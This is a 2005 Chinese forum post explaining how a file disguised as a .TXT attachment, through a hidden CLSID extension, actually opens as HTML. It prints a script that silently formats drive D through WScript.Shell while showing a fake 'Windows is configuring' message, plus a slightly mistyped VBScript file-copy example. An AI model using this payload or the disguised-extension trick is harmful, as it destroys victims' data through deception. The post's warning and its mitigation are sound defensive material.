找回密码
 注册
搜索
热搜: 超星 读书 找书
查看: 490|回复: 0

[【求助】] 浅谈TXT文件的安全性

[复制链接]
发表于 2005-8-20 08:15:54 | 显示全部楼层 |阅读模式
浅谈TXT文件的安全性  


大家都知道,现在大多数病毒的传播媒介都是可执行文件或脚本文件,但当你收到一分附件为.TXT为后缀名的邮件时,你会不会有所警觉呢?在一定程度上也可以造成破坏!由于目前大多数人使用的是Windows系列的操作系统,而Windows设置是隐藏已知文件扩展名的。当你点击那个看上去很友善的文件时,那些破坏性的东西就会一一跳了出来。
假如你收到一分邮件,附件里的文件名为“美媚大放送.TXT”,你是不是会认定他肯定是纯文本文件呢?那可不一定哦!它的实际文件名可以是“美媚大放送.TXT.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}”。其中的“{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}”在注册表里的含义是HTML文件关联。但是存成文件时它就不会显现出来,你看到的这个.TXT文件其实就是“美媚大放送.TXT.HTML”。那么打开这个文件又会有什么危害呢?如果这个文件的内容如下(警告:以下代码可能带有攻击性,禁止乱用,一切使用后过自负!):
----------------------------------------------------------
〈script〉
a=new ActiveXObject(\"WSCript.Shell\");
a.run(\"format.com D:/q /autotest /u\");
alert(\"Windows is configuring the system. Please do not interrupt this process.\");
〈/script〉
----------------------------------------------------------
那么它就会调用IE运行FORMAT命令,同时显示“Windows is configuring the system. Please do not interrupt this process.”,呵呵,这下你可就惨了。。。要注意哦~
大家大概已经注意到第二行的“WSCript”了吧,对啊,就是它在导演着这场戏。
WSCript全称“Windows Scripting Host”,它是Windows 98新增的功能,是一种批次语言/自动执行工具——它所对应的程序“WSCript.exe”是一个脚本语言解释器,为于WINDOWS目录下,正是它才使得脚本可以被执行,就象执行批处理一样。在Windows Scripting Host脚本环境里,预定义了一些对象,通过它自带的几个对象,可以实现获取环境变量、创建快捷方式、加载程序、读写注册表等功能。
下面我们通过一个小的例子来说明WSCript的功能是如何的强大,而使用又是何等的简单,被人利用的威胁有是如何之大。例如有一个.vbs文件:

Set so=CreatObject(Scripting.FileSystemObject\")
so.GetFile(c:\\Windows\\winipcfg.exe).Copy(\"e:\\winipcfg.exe\")

这么短短的两行就可以COPY一个文件到指定位置。第一行:创建一个文件系统对象;第二行:打开脚本文件,c:\\Windows\\winipcfg.exe指明这个程序本身,是一个完整的路径文件名。GetFile函数获得这个文件,Copy函数将这个文件复制到E盘根目录下。这也是现今大多数利用VBscript编写的病毒的一个特点。由此可以看出禁止FileSystemObject对象就可以有效地控制这种病毒的传播。禁止FileSystemObject对象可用如下命令:

regsvr32 scrrun.dll /u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|网上读书园地

GMT+8, 2024-11-19 19:41 , Processed in 0.151715 second(s), 18 queries .

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表